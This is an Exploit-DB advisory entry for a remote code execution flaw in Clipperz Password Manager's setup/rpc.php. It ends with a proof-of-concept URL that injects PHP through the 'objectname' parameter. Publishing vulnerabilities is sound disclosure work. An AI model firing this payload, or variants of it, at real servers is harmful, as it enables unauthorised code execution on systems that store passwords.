Clipperz Password Manager - '/backend/PHP/src/setup/rpc.php' Remote Code Execution

EDB-ID:

39191

CVE:





Platform:

PHP

Date:

2014-05-20


source: https://www.securityfocus.com/bid/67498/info

Clipperz Password Manager is prone to remote code-execution vulnerability.

Attackers can exploit this issue to execute arbitrary code in the context of the affected application. 

http://www.example.com/password-manager-master/backend/php/src/setup/rpc.php?objectname=Xmenu();print_r(php_uname());die